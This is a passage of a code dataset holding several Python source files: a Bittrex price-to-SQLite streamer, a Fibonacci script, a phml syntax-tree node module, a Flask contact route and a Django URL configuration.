BTC_PAIRS_ASK (UNIX_Time INT, ' + self.pair_vector + ')'\n bid_string = 'CREATE TABLE IF NOT EXISTS BTC_PAIRS_BID (UNIX_Time INT, ' + self.pair_vector + ')'\n #print(price_string)\n c.execute(price_string)\n c.execute(volume_string)\n c.execute(ask_string)\n c.execute(bid_string)\n conn.commit()\n conn.close()\n else:\n print(\"create your data base first!\")\n\n def getTicker(self):\n # fetch the data from the exchange\n try:\n data = requests.get(self.url).json()['result']\n except ValueError:\n print('There was a ValueError in getTicker')\n time.sleep(60)\n return self.getTicker()\n return data\n\n\n def updateDB(self):\n data_all = self.getTicker()\n price_vec = ''\n volume_vec = ''\n ask_vec = ''\n bid_vec = ''\n bittrex_coinlist = []\n index_list = []\n # if Bittrex adds a new coin pari you would get an error in your database.\n # So, generate index_list of the current BTC-pairs from bittrex which are in your database\n\n for i in range(0, len(data_all)):\n bittrex_coinlist.append(data_all[i]['MarketName'])\n\n coins_dict = {key: [0, 0, 0, 0] for (key) in self.pairlist}\n for idx, coin in enumerate(self.pairlist):\n for i in range(0, len(data_all)):\n coins_passed = 0\n if coin == data_all[i]['MarketName']:\n coins_dict[coin][0] = data_all[i]['Last']\n coins_dict[coin][1] = data_all[i]['BaseVolume']\n coins_dict[coin][2] = data_all[i]['Ask']\n coins_dict[coin][3] = data_all[i]['Bid']\n\n\n # compose the SQL data vector\n for id, coin in enumerate(self.pairlist):\n if id < len(self.pairlist) - 1:\n price_vec += str(coins_dict[coin][0]) + ','\n volume_vec += str(coins_dict[coin][1]) + ','\n ask_vec += str(coins_dict[coin][2]) + ','\n bid_vec += str(coins_dict[coin][3]) + ','\n else:\n # do not add ',' to the last entry\n price_vec += str(coins_dict[coin][0])\n volume_vec += str(coins_dict[coin][1])\n ask_vec += str(coins_dict[coin][2])\n bid_vec += str(coins_dict[coin][3])\n\n date = time.strftime(\"%m.%d.%y_%H:%M:%S\", time.localtime())\n unixtime = int(time.time())\n\n # string vectors to update the sql database\n self.insert_price = \"INSERT INTO BTC_PAIRS_PRICE (\" + self.col_vector + \") \" + \" VALUES (\" + str(unixtime) + \",\" + price_vec + \")\"\n self.insert_volume = \"INSERT INTO BTC_PAIRS_VOLUME (\" + self.col_vector + \") \" + \" VALUES (\" + str(unixtime) + \",\" + volume_vec + \")\"\n self.insert_ask = \"INSERT INTO BTC_PAIRS_ASK (\" + self.col_vector + \") \" + \" VALUES (\" + str(unixtime) + \",\" + ask_vec + \")\"\n self.insert_bid = \"INSERT INTO BTC_PAIRS_BID (\" + self.col_vector + \") \" + \" VALUES (\" + str(unixtime) + \",\" + bid_vec + \")\"\n\n # connect to DB\n conn = sqlite3.connect(self.path)\n c = conn.cursor()\n c.execute(self.insert_price)\n c.execute(self.insert_volume)\n c.execute(self.insert_ask)\n c.execute(self.insert_bid)\n conn.commit()\n conn.close()\n print('Update the data base at ' + str(date))\n","repo_name":"mhansinger/CryptoDB","sub_path":"bittrexStream.py","file_name":"bittrexStream.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"43833153473","text":"n = int(input(\"Please enter a number: \"))\ndic = {0: 0, 1: 1}\n\n\ndef fab(n1):\n if n1 in dic:\n return dic[n1]\n else:\n temp = fab(n1 - 1) + fab(n1 - 2)\n dic[n1] = temp\n return temp\n\n\nfor i in range(n):\n print(fab(i + 1), end=\" \")\n","repo_name":"amazing-2020/pdf","sub_path":"Python/code case/code case 19.py","file_name":"code case 
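# --- Editor's note: illustrative sketch, not part of the original dataset record.
# The Bittrex streamer above assembles its INSERT statements by string
# concatenation. The values are numeric here, but the same pattern with '?'
# placeholders is safer and avoids quoting bugs; `insert_row` is a
# hypothetical helper, not a name from the source.

import sqlite3

def insert_row(db_path, table, columns, values):
    # Identifiers (table/column names) cannot be bound as parameters, so the
    # columns list must be trusted and pre-validated; the values are bound
    # safely through sqlite3's parameter substitution.
    placeholders = ', '.join('?' for _ in values)
    sql = f"INSERT INTO {table} ({', '.join(columns)}) VALUES ({placeholders})"
    with sqlite3.connect(db_path) as conn:
        conn.execute(sql, values)

# insert_row('bittrex.db', 'BTC_PAIRS_PRICE',
#            ['UNIX_Time', 'BTC_LTC'], [1700000000, 0.0123])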
19.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25846153740","text":"from __future__ import annotations\n\nfrom enum import StrEnum, unique\nfrom types import NoneType\nfrom typing import Any, Iterator, NoReturn, TypeAlias, overload\n\nfrom saimll import SAIML\n\nAttribute: TypeAlias = str | bool\n\n\nclass Missing:\n pass\n\n\nMISSING = Missing()\n\n\ndef p_code(value) -> str: # pragma: no cover\n \"\"\"Get python code representation of phml nodes.\"\"\"\n if value is None:\n return \"None\"\n return value.__p_code__()\n\n\n@unique\nclass LiteralType(StrEnum):\n Text = \"text\"\n Comment = \"comment\"\n\n @staticmethod\n def From(type: str) -> str:\n types = [\"text\", \"comment\"]\n if type in types:\n return type\n raise ValueError(f\"Expected on of {', '.join(types)}\")\n\n\n@unique\nclass NodeType(StrEnum):\n AST = \"ast\"\n ELEMENT = \"element\"\n LITERAL = \"literal\"\n\n\nclass Point:\n \"\"\"Represents one place in a source file.\n\n The line field (1-indexed integer) represents a line in a source file. The column field\n (1-indexed integer) represents a column in a source file. The offset field (0-indexed integer)\n represents a character in a source file.\n \"\"\"\n\n def __init__(self, line: int, column: int) -> None:\n if line is None or line < 0:\n raise IndexError(f\"Point.line must be >= 0 but was {line}\")\n\n self.line = line\n\n if column is None or column < 0:\n raise IndexError(f\"Point.column must be >= 0 but was {column}\")\n\n self.column = column\n\n def __eq__(self, _o) -> bool:\n return (\n isinstance(_o, self.__class__)\n and _o.line == self.line\n and _o.column == self.column\n )\n\n @staticmethod\n def from_dict(data: dict) -> Point:\n return Point(data[\"line\"], data[\"column\"])\n\n def __p_code__(self) -> str:\n return f\"Point({self.line}, {self.column})\"\n\n def __repr__(self) -> str:\n return f\"{self.line}:{self.column}\"\n\n def __str__(self) -> str:\n return f\"\\x1b[38;5;244m{self.line}:{self.column}\\x1b[39m\"\n\n\nclass Position:\n \"\"\"Position represents the location of a node in a source file.\n\n The `start` field of `Position` represents the place of the first character\n of the parsed source region. 
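# --- Editor's note: illustrative sketch, not part of the original dataset record.
# The Fibonacci record above memoizes with an explicit dict; functools gives
# the same O(n) behaviour with less bookkeeping.

from functools import lru_cache

@lru_cache(maxsize=None)
def fib(n):
    return n if n < 2 else fib(n - 1) + fib(n - 2)

assert [fib(i) for i in range(1, 8)] == [1, 1, 2, 3, 5, 8, 13]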
The `end` field of Position represents the place\n of the first character after the parsed source region, whether it exists or not.\n The value of the `start` and `end` fields implement the `Point` interface.\n\n The `indent` field of `Position` represents the start column at each index\n (plus start line) in the source region, for elements that span multiple lines.\n\n If the syntactic unit represented by a node is not present in the source file at\n the time of parsing, the node is said to be `generated` and it must not have positional\n information.\n \"\"\"\n\n @overload\n def __init__(\n self,\n start: Point,\n end: Point,\n ) -> None:\n \"\"\"\n Args:\n start (tuple[int, int, int | None]): Tuple representing the line, column, and optional\n offset of the start point.\n end (tuple[int, int, int | None]): Tuple representing the line, column, and optional\n offset of the end point.\n indent (Optional[int], optional): The indent amount for the start of the position.\n \"\"\"\n ...\n\n @overload\n def __init__(\n self,\n start: tuple[int, int],\n end: tuple[int, int],\n ) -> None:\n \"\"\"\n Args:\n start (tuple[int, int, int | None]): Tuple representing the line, column, and optional\n offset of the start point.\n end (tuple[int, int, int | None]): Tuple representing the line, column, and optional\n offset of the end point.\n indent (Optional[int], optional): The indent amount for the start of the position.\n \"\"\"\n ...\n\n def __init__(self, start: Point | tuple[int, int], end: Point | tuple[int, int]):\n \"\"\"\n Args:\n start (Point): Starting point of the position.\n end (Point): End point of the position.\n indent (int | None): The indent amount for the start of the position.\n \"\"\"\n\n self.start = Point(start[0], start[1]) if isinstance(start, tuple) else start\n self.end = Point(end[0], end[1]) if isinstance(end, tuple) else end\n\n def __p_code__(self) -> str:\n return f\"Position({p_code(self.start)}, {p_code(self.end)})\"\n\n def __eq__(self, _o):\n return (\n isinstance(_o, Position) and _o.start == self.start and _o.end == self.end\n )\n\n @staticmethod\n def from_pos(pos: Position) -> Position:\n \"\"\"Create a new position from another position object.\"\"\"\n return Position(\n (pos.start.line, pos.start.column),\n (pos.end.line, pos.end.column),\n )\n\n @staticmethod\n def from_dict(data: dict) -> Position | None:\n if data is None:\n return None\n return Position(Point.from_dict(data[\"start\"]), Point.from_dict(data[\"end\"]))\n\n def as_dict(self) -> dict:\n \"\"\"Convert the position object to a dict.\"\"\"\n return {\n \"start\": {\n \"line\": self.start.line,\n \"column\": self.start.column,\n },\n \"end\": {\n \"line\": self.end.line,\n \"column\": self.end.column,\n },\n }\n\n def __repr__(self) -> str:\n # indent = f\" ~ {self.indent}\" if self.indent is not None else \"\"\n return f\"<{self.start!r}-{self.end!r}>\"\n\n def __str__(self) -> str:\n return f\"\\x1b[38;5;8m<\\x1b[39m{self.start}\\x1b[38;5;8m-\\x1b[39m{self.end}\\x1b[38;5;8m>\\x1b[39m\"\n\n\nclass Node:\n \"\"\"Base phml node. 
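# --- Editor's note: usage sketch, not part of the original dataset record.
# Assuming the module above is importable as phml.nodes (per its sub_path),
# Position accepts either Point objects or (line, column) tuples and
# compares by value:

from phml.nodes import Point, Position

pos_a = Position(Point(1, 1), Point(2, 5))
pos_b = Position((1, 1), (2, 5))        # tuples are promoted to Points
assert pos_a == pos_b
assert pos_a.as_dict()["start"] == {"line": 1, "column": 1}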
Defines a type and basic interactions.\"\"\"\n\n def __init__(\n self,\n _type: NodeType,\n position: Position | None = None,\n parent: Parent | None = None,\n in_pre: bool = False,\n ) -> None:\n self._position = position\n self.parent = parent\n self._type = _type\n self.in_pre = in_pre\n\n def __p_code__(self) -> str:\n in_pre = f\", in_pre={self.in_pre}\" if self.in_pre else \"\"\n return f\"Node({self.type!r}, position={p_code(self.position)}{in_pre})\"\n\n def __eq__(self, _o):\n return (\n isinstance(_o, self.__class__)\n and self.type == _o.type\n and self.in_pre == _o.in_pre\n )\n\n def as_dict(self) -> dict:\n return {\n \"type\": str(self._type),\n }\n\n @staticmethod\n def from_dict(data: dict, in_pre: bool = False):\n if data[\"type\"] == NodeType.AST:\n ast = AST(\n children=[] if data[\"children\"] is not None else None,\n )\n if data[\"children\"] is not None:\n for child in data[\"children\"]:\n ast.append(Node.from_dict(child, in_pre))\n return ast\n elif data[\"type\"] == NodeType.ELEMENT:\n return Element.from_dict(data)\n elif data[\"type\"] == NodeType.LITERAL:\n return Literal(\n LiteralType.From(data[\"name\"]),\n data[\"content\"],\n )\n raise ValueError(\n f\"Phml ast dicts must have nodes with the following types: {NodeType.AST}, {NodeType.ELEMENT}, {NodeType.LITERAL}\",\n )\n\n @property\n def position(self) -> Position | None:\n \"\"\"The position of the node in the parsed phml text.\n Is `None` if the node was generated.\n \"\"\"\n return self._position\n\n @property\n def type(self) -> str:\n \"\"\"The node type. Either root, element, or litera.\"\"\"\n return self._type\n\n def pos_as_str(self, color: bool = False) -> str: # pragma: no cover\n \"\"\"Return the position formatted as a string.\"\"\"\n\n position = \"\"\n if self.position is not None:\n if color:\n start = self.position.start\n end = self.position.end\n position = SAIML.parse(\n f\"<[@F244]{start.line}[@F]-[@F244]{start.column}[@F]\"\n f\":[@F244]{end.line}[@F]-[@F244]{end.column}[@F]>\",\n )\n else:\n start = self.position.start\n end = self.position.end\n position = f\"<{start.line}-{start.column}:{end.line}-{end.column}>\"\n return position\n\n def __repr__(self) -> str:\n return f\"{self.type}()\"\n\n def __format__(self, indent: int = 0, color: bool = False, text: bool = False):\n if color:\n return (\n SAIML.parse(f\"{' '*indent}[@Fred]{self.type}[@F]\")\n + f\" {self.pos_as_str(True)}\"\n )\n return f\"{' '*indent}{self.type} {self.pos_as_str()}\"\n\n def __str__(self) -> str:\n return self.__format__()\n\n\nclass Parent(Node):\n def __init__(\n self,\n _type: NodeType,\n children: list[Node] | None,\n position: Position | None = None,\n parent: Parent | None = None,\n in_pre: bool = False,\n ) -> None:\n super().__init__(_type, position, parent, in_pre)\n self.children = [] if children is not None else None\n\n if children is not None:\n self.extend(children)\n\n def __p_code__(self) -> str:\n children = (\n \"None\"\n if self.children is None\n else f\"[{', '.join([p_code(child) for child in self])}]\"\n )\n in_pre = f\", in_pre={self.in_pre}\" if self.in_pre else \"\"\n return f\"Parent({self.type!r}, position={p_code(self.position)}{in_pre}, children={children})\"\n\n def __iter__(self) -> Iterator[Parent | Literal]:\n if self.children is not None:\n yield from self.children\n\n @overload\n def __setitem__(self, key: int, value: Node) -> NoReturn:\n ...\n\n @overload\n def __setitem__(self, key: slice, value: list) -> NoReturn:\n ...\n\n def __setitem__(self, key: int | slice, value: 
Node | list):\n if self.children is not None:\n if isinstance(key, int):\n if not isinstance(value, Node):\n raise ValueError(\n \"Can not assign value that is not phml.Node to children\",\n )\n value.parent = self\n self.children[key] = value\n elif isinstance(key, slice):\n if not isinstance(value, list):\n raise ValueError(\n \"Can not assign value that is not list[phml.Node] to slice of children\",\n )\n for v in value:\n v.parent = self\n self.children[key] = value\n else:\n raise ValueError(\"Invalid value type. Expected phml Node\")\n\n @overload\n def __getitem__(self, _k: int) -> Parent | Literal:\n ...\n\n @overload\n def __getitem__(self, _k: slice) -> list[Parent | Literal]:\n ...\n\n def __getitem__(\n self,\n key: int | slice,\n ) -> Parent | Literal | list[Parent | Literal]:\n if self.children is not None:\n return self.children[key]\n raise ValueError(\"A self closing element can not be indexed\")\n\n @overload\n def __delitem__(self, key: int) -> NoReturn:\n ...\n\n @overload\n def __delitem__(self, key: slice) -> NoReturn:\n ...\n\n def __delitem__(self, key: int | slice):\n if self.children is not None:\n del self.children[key]\n else:\n raise ValueError(\"Can not use del for a self closing elements children\")\n\n def pop(self, idx: int = 0) -> Node:\n \"\"\"Pop a node from the children. Defaults to index 0\"\"\"\n if self.children is not None:\n return self.children.pop(idx)\n raise ValueError(\"A self closing element can not pop a child node\")\n\n def index(self, node: Node) -> int:\n \"\"\"Get the index of a node in the children.\"\"\"\n if self.children is not None:\n return self.children.index(node)\n raise ValueError(\"A self closing element can not be indexed\")\n\n def append(self, node: Node):\n \"\"\"Append a child node to the end of the children.\"\"\"\n if self.children is not None:\n node.parent = self\n self.children.append(node)\n else:\n raise ValueError(\n \"A child node can not be appended to a self closing element\",\n )\n\n def extend(self, nodes: list):\n \"\"\"Extend the children with a list of nodes.\"\"\"\n if self.children is not None:\n for child in nodes:\n child.parent = self\n self.children.extend(nodes)\n else:\n raise ValueError(\n \"A self closing element can not have it's children extended\",\n )\n\n def insert(self, index: int, nodes: Node | list):\n \"\"\"Insert a child node or nodes into a specific index of the children.\"\"\"\n if self.children is not None:\n if isinstance(nodes, list):\n for n in nodes:\n n.parent = self\n self.children[index:index] = nodes\n else:\n self.children.insert(index, nodes)\n else:\n raise ValueError(\n \"A child node can not be inserted into a self closing element\",\n )\n\n def remove(self, node: Node):\n \"\"\"Remove a child node from the children.\"\"\"\n if self.children is None:\n raise ValueError(\n \"A child node can not be removed from a self closing element.\",\n )\n self.children.remove(node)\n\n def len_as_str(self, color: bool = False) -> str: # pragma: no cover\n if color:\n return SAIML.parse(\n f\"[@F66]{len(self) if self.children is not None else '/'}[@F]\",\n )\n return f\"{len(self) if self.children is not None else '/'}\"\n\n def __len__(self) -> int:\n return len(self.children) if self.children is not None else 0\n\n def __repr__(self) -> str:\n return f\"{self.type}(cldrn={self.len_as_str()})\"\n\n def __format__(self, indent: int = 0, color: bool = False, text: bool = False):\n output = [f\"{' '*indent}{self.type} [{self.len_as_str()}]{self.pos_as_str()}\"]\n if color:\n output[0] 
= (\n SAIML.parse(f\"{' '*indent}[@Fred]{self.type}[@F]\")\n + f\" [{self.len_as_str(True)}]\"\n + f\" {self.pos_as_str(True)}\"\n )\n for child in self.children or []:\n output.extend(child.__format__(indent=indent + 2, color=color, text=text))\n return output\n\n def __str__(self) -> str:\n return \"\\n\".join(self.__format__())\n\n def as_dict(self) -> dict:\n return {\n \"children\": [child.as_dict() for child in self.children]\n if self.children is not None\n else None,\n **super().as_dict(),\n }\n\n\nclass AST(Parent):\n def __init__(\n self,\n children: list[Node] | None = None,\n position: Position | None = None,\n in_pre: bool = False,\n ) -> None:\n super().__init__(NodeType.AST, children or [], position, None, in_pre)\n\n def __eq__(self, _o):\n return isinstance(_o, AST) and (\n (_o.children is None and self.children is None)\n or (len(_o) == len(self) and all(c1 == c2 for c1, c2 in zip(_o, self)))\n )\n\n def __p_code__(self) -> str:\n children = (\n \"None\"\n if self.children is None\n else f\"[{', '.join([p_code(child) for child in self])}]\"\n )\n in_pre = f\", in_pre={self.in_pre}\" if self.in_pre else \"\"\n return f\"AST(position={p_code(self.position)}, children={children}{in_pre})\"\n\n\nclass Element(Parent):\n def __init__(\n self,\n tag: str,\n attributes: dict[str, Attribute] | None = None,\n children: list[Node] | None = None,\n position: Position | None = None,\n parent: Parent | None = None,\n in_pre: bool = False,\n ) -> None:\n super().__init__(NodeType.ELEMENT, children, position, parent, in_pre)\n self.tag = tag\n self.attributes = attributes or {}\n self.context = {}\n\n def __p_code__(self) -> str:\n children = (\n \"None\"\n if self.children is None\n else f\"[{', '.join([p_code(child) for child in self])}]\"\n )\n in_pre = f\", in_pre={self.in_pre}\" if self.in_pre else \"\"\n return f\"Element({self.tag!r}, position={p_code(self.position)}, attributes={self.attributes}, children={children}{in_pre})\"\n\n def __eq__(self, _o) -> bool:\n return (\n isinstance(_o, Element)\n and _o.tag == self.tag\n and (\n len(self.attributes) == len(_o.attributes)\n and all(key in self.attributes for key in _o.attributes)\n and all(\n _o.attributes[key] == value\n for key, value in self.attributes.items()\n )\n )\n and (\n (_o.children is None and self.children is None)\n or (len(_o) == len(self) and all(c1 == c2 for c1, c2 in zip(_o, self)))\n )\n )\n\n def as_dict(self) -> dict:\n return {\"tag\": self.tag, \"attributes\": self.attributes, **super().as_dict()}\n\n @staticmethod\n def from_dict(data: dict, in_pre: bool = False) -> Element:\n element = Element(\n data[\"tag\"],\n attributes=data[\"attributes\"],\n children=[] if data[\"children\"] is not None else None,\n )\n if data[\"children\"] is not None:\n element.children = [\n Node.from_dict(child, in_pre or data[\"tag\"] == \"pre\")\n for child in data[\"children\"]\n ]\n return element\n\n @property\n def tag_path(self) -> list[str]:\n \"\"\"Get the list of all the tags to the current element. 
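# --- Editor's note: usage sketch, not part of the original dataset record.
# With the AST, Element, and Literal classes defined in this record, a tiny
# tree can be assembled; append() maintains the parent/child links, and
# attributes are reachable through string indexing:

from phml.nodes import AST, Element, Literal, LiteralType

doc = AST()
div = Element("div", attributes={"class": "note"})
div.append(Literal(LiteralType.Text, "hello"))
doc.append(div)

assert div.parent is doc
assert div["class"] == "note"
assert div.tag_path == ["div"]   # stops at the AST root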
Inclusive.\"\"\"\n path = [self.tag]\n parent = self\n while isinstance(parent.parent, Element):\n path.append(parent.parent.tag)\n parent = parent.parent\n\n path.reverse()\n return path\n\n def __hash__(self) -> int:\n return (\n hash(self.tag)\n + sum(hash(attr) for attr in self.attributes.values())\n + hash(len(self))\n )\n\n def __contains__(self, _k: str) -> bool:\n return _k in self.attributes\n\n @overload\n def __getitem__(self, _k: int) -> Parent | Literal:\n ...\n\n @overload\n def __getitem__(self, _k: str) -> Attribute:\n ...\n\n @overload\n def __getitem__(self, _k: slice) -> list[Parent | Literal]:\n ...\n\n def __getitem__(\n self,\n _k: str | int | slice,\n ) -> Attribute | Parent | Literal | list[Parent | Literal]:\n if isinstance(_k, str):\n return self.attributes[_k]\n\n if self.children is not None:\n return self.children[_k]\n\n raise ValueError(\"A self closing element can not have it's children indexed\")\n\n @overload\n def __setitem__(self, key: int, value: Node) -> NoReturn:\n ...\n\n @overload\n def __setitem__(self, key: slice, value: list) -> NoReturn:\n ...\n\n @overload\n def __setitem__(self, key: str, value: Attribute) -> NoReturn:\n ...\n\n def __setitem__(self, key: str | int | slice, value: Attribute | Node | list):\n if isinstance(key, str) and isinstance(value, Attribute):\n self.attributes[key] = value\n elif self.children is not None:\n if isinstance(key, int) and isinstance(value, Node):\n value.parent = self\n self.children[key] = value\n elif isinstance(key, slice) and isinstance(value, list):\n for child in value:\n child.parent = self\n self.children[key] = value\n else:\n raise ValueError(\n \"A self closing element can not have a subset of it's children assigned to\",\n )\n\n @overload\n def __delitem__(self, key: int) -> NoReturn:\n ...\n\n @overload\n def __delitem__(self, key: slice) -> NoReturn:\n ...\n\n @overload\n def __delitem__(self, key: str) -> NoReturn:\n ...\n\n def __delitem__(self, key: str | int | slice):\n if isinstance(key, str):\n del self.attributes[key]\n elif self.children is not None:\n del self.children[key]\n else:\n raise ValueError(\"Can not use del for a self closing elements children\")\n\n @overload\n def pop(self, idx: int = 0) -> Node:\n ...\n\n @overload\n def pop(self, idx: str, _default: Any = MISSING) -> Attribute:\n ...\n\n def pop(self, idx: str | int = 0, _default: Any = MISSING) -> Attribute | Node:\n \"\"\"Pop a specific attribute from the elements attributes. A default value\n can be provided for when the value is not found, otherwise an error is thrown.\n \"\"\"\n if isinstance(idx, str):\n if _default != MISSING:\n return self.attributes.pop(idx, _default)\n return self.attributes.pop(idx)\n if self.children is not None:\n return self.children.pop(idx)\n\n raise ValueError(\"A self closing element can not pop a child node\")\n\n def get(self, key: str, _default: Any = MISSING) -> Attribute:\n \"\"\"Get a specific element attribute. 
Returns `None` if not found\n unless `_default` is defined.\n\n Args:\n key (str): The name of the attribute to retrieve.\n _default (str|bool): The default value to return if the key\n isn't an attribute.\n\n Returns:\n str|bool|None: str or bool if the attribute exists or a default\n was provided, else None\n \"\"\"\n if not isinstance(_default, (Attribute, NoneType)) and _default != MISSING:\n raise TypeError(\"_default value must be str, bool, or MISSING\")\n\n if key in self:\n return self[key]\n if _default != MISSING:\n return _default\n raise ValueError(f\"Attribute {key!r} not found\")\n\n def attrs_as_str(self, indent: int, color: bool = False) -> str: # pragma: no cover\n \"\"\"Return a str representation of the attributes\"\"\"\n if color:\n attrs = (\n (\n f\"\\n{' '*(indent)}▸ \"\n + f\"\\n{' '*(indent)}▸ \".join(\n str(key)\n + \": \"\n + (\n f\"\\x1b[32m{value!r}\\x1b[39m\"\n if isinstance(value, str)\n else f\"\\x1b[35m{value}\\x1b[39m\"\n )\n for key, value in self.attributes.items()\n )\n )\n if len(self.attributes) > 0\n else \"\"\n )\n else:\n attrs = (\n (\n f\"\\n{' '*(indent)}▸ \"\n + f\"\\n{' '*(indent)}▸ \".join(\n f\"{key}: {value!r}\" for key, value in self.attributes.items()\n )\n )\n if len(self.attributes) > 0\n else \"\"\n )\n\n return attrs\n\n def __repr__(self) -> str:\n return f\"{self.type}.{self.tag}(cldrn={self.len_as_str()}, attrs={self.attributes})\"\n\n def __format__(\n self,\n indent: int = 0,\n color: bool = False,\n text: bool = False,\n ) -> list[str]: # pragma: no cover\n output: list[str] = []\n if color:\n output.append(\n f\"{' '*indent}\"\n + SAIML.parse(f\"[@Fred]{self.type}[@F]\" + f\".[@Fblue]{self.tag}[@F]\")\n + f\" [{self.len_as_str(True)}]\"\n + f\" {self.pos_as_str(True)}\"\n + f\"{self.attrs_as_str(indent+2, True)}\",\n )\n else:\n output.append(\n f\"{' '*indent}{self.type}.{self.tag}\"\n + f\" [{self.len_as_str()}]{self.pos_as_str()}{self.attrs_as_str(indent+2)}\",\n )\n\n for child in self.children or []:\n output.extend(child.__format__(indent=indent + 2, color=color, text=text))\n return output\n\n def __str__(self) -> str:\n return \"\\n\".join(self.__format__())\n\n\nclass Literal(Node):\n def __init__(\n self,\n name: str,\n content: str,\n parent: Parent | None = None,\n position: Position | None = None,\n in_pre: bool = False,\n ) -> None:\n super().__init__(NodeType.LITERAL, position, parent, in_pre)\n self.name = name\n self.content = content\n\n def __hash__(self) -> int:\n return hash(self.content) + hash(str(self.name))\n\n def __p_code__(self) -> str:\n in_pre = \", in_pre=True\" if self.in_pre else \"\"\n return f\"Literal({str(self.name)!r}, {self.content!r}{in_pre})\"\n\n def __eq__(self, _o) -> bool:\n return (\n isinstance(_o, Literal)\n and _o.type == self.type\n and self.name == _o.name\n and self.content == _o.content\n )\n\n def as_dict(self) -> dict:\n return {\"name\": str(self.name), \"content\": self.content, **super().as_dict()}\n\n @staticmethod\n def is_text(node: Node) -> bool:\n \"\"\"Check if a node is a literal and a text node.\"\"\"\n return isinstance(node, Literal) and node.name == LiteralType.Text\n\n @staticmethod\n def is_comment(node: Node) -> bool:\n \"\"\"Check if a node is a literal and a comment.\"\"\"\n return isinstance(node, Literal) and node.name == LiteralType.Comment\n\n def __repr__(self) -> str: # pragma: no cover\n return f\"{self.type}.{self.name}(len={len(self.content)})\"\n\n def __format__(\n self,\n indent: int = 0,\n color: bool = False,\n text: bool = False,\n ): # 
pragma: no cover\n from .helpers import normalize_indent\n\n content = \"\"\n if text:\n offset = \" \" * (indent + 2)\n content = (\n f'{offset}\"\"\"\\n{normalize_indent(self.content, indent+4)}\\n{offset}\"\"\"'\n )\n if color:\n return [\n SAIML.parse(\n f\"{' '*indent}[@Fred]{self.type}[@F].[@Fblue]{self.name}[@F]\"\n + (f\"\\n[@Fgreen]{SAIML.escape(content)}[@F]\" if text else \"\"),\n ),\n ]\n return [\n f\"{' '*indent}{self.type}.{self.name}\" + (f\"\\n{content}\" if text else \"\"),\n ]\n\n def __str__(self) -> str: # pragma: no cover\n return self.__format__()[0]\n\n\ndef inspect(\n node: Node,\n color: bool = False,\n text: bool = False,\n) -> str: # pragma: no cover\n \"\"\"Inspected a given node recursively.\n\n Args:\n node (Node): Any type of node to inspect.\n color (bool): Whether to return a string with ansi encoding. Default False.\n text (bool): Whether to include the text from comment and text nodes. Default False.\n\n Return:\n A formatted multiline string representation of the node and it's children.\n \"\"\"\n if isinstance(node, Node):\n return \"\\n\".join(node.__format__(color=color, text=text))\n raise TypeError(f\"Can only inspect phml Nodes was, {node!r}\")\n","repo_name":"Tired-Fox/phml","sub_path":"phml/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":27428,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"74392891713","text":"from flask import *\n\nfrom Components.database import *\n\nroutes = Blueprint('routes' , __name__ ,)\n\n\n@routes.route(\"/api/contact\" , methods = ['POST'])\ndef contact():\n email = request.json['email']\n name = request.json['name']\n phone = request.json['phone']\n msg = request.json['msg']\n \n return jsonify({\n \"messages\": \"Thank you for your message! 
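# --- Editor's note: illustrative sketch, not part of the original dataset record.
# The Flask contact route above indexes request.json fields directly, so a
# missing key raises. A defensive variant validates the payload first;
# `validate_contact` and REQUIRED_FIELDS are hypothetical, not from the source.

REQUIRED_FIELDS = ("email", "name", "phone", "msg")

def validate_contact(payload):
    if not isinstance(payload, dict):
        return False, "expected a JSON object"
    missing = [f for f in REQUIRED_FIELDS if not payload.get(f)]
    if missing:
        return False, f"missing fields: {', '.join(missing)}"
    return True, ""

assert validate_contact({"email": "a@b.c", "name": "A",
                         "phone": "1", "msg": "hi"}) == (True, "")
assert validate_contact({})[0] is False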
We will be in touch soon\",\n })","repo_name":"taidavis1/BookingApp","sub_path":"Backend/Components/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43600987706","text":"from django.urls import path\n\nfrom person.views import LoginUser\nfrom .views import *\n\nurlpatterns = [\n path('', LoginUser.as_view(), name='login'),\n path('statements_list/', StatementsView.as_view(), name='statements_list'),\n path('statements/statement_add/', StatementAdd.as_view(), name='statement_add'),\n path('statements/statement_mod/', StatementMod.as_view(), name='statement_mod'),\n\n path('contracts/contracts_list/', ContractsView.as_view(), name='contracts_list'),\n path('contracts/contract_add/', ContractAdd.as_view(), name='contract_add'),\n path('contracts/contract_mod/', ContractMod.as_view(), name='contract_mod'),\n path('contracts/contract_print/', ContractPrint.as_view(), name='contract_print'),\n path('contracts/contract_view/', ContractView.as_view(), name='contract_view'),\n path('contracts/contract/', ContractVee.as_view(), name='contract'),\n\n path('plot_wood_species/plot_wood_species_add/', PlotWoodSpeciesAdd.as_view(), name='plot_wood_species_add'),\n path('plot_wood_species/plot_wood_species_mod/', PlotWoodSpeciesMod.as_view(), name='plot_wood_species_mod'),\n\n path('guides/', GuidesView.as_view(), name='guides'),\n\n path('guides/breeds/', BreedsView.as_view(), name='breeds'),\n path('guides/breeds/breed_mod/', BreedMod.as_view(), name='breed_mod'),\n path('guides/breeds/form_del/', BreedDel.as_view(), name='form_breed_del'),\n\n path('guides/tracts/', TractsView.as_view(), name='tracts'),\n path('guides/tracts/tract_mod/', TractMod.as_view(), name='tract_mod'),\n path('guides/tracts/form_del/', TractDel.as_view(), name='form_tract_del'),\n\n # path('guides/forestrys/', ForestryView.as_view(), name='forestrys'),\n # path('guides/forestrys/forestry_mod/', ForestryMod.as_view(), name='forestry_mod'),\n # path('guides/forestrys/form_del/', ForestryDel.as_view(), name='form_forestry_del'),\n\n path('guides/district_forestrys/', DistrictForestryView.as_view(), name='district_forestrys'),\n path('guides/district_forestrys/district_forestry_mod/', DistrictForestryMod.as_view(), name='district_forestry_mod'),\n path('guides/district_forestrys/form_del/', DistrictForestryDel.as_view(), name='form_district_forestry_del'),\n]\n","repo_name":"drugoifynjy/Les","sub_path":"les/sobnushdi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"529471663","text":"import pygeoip\nimport requests\nimport os\nfrom common.constants import 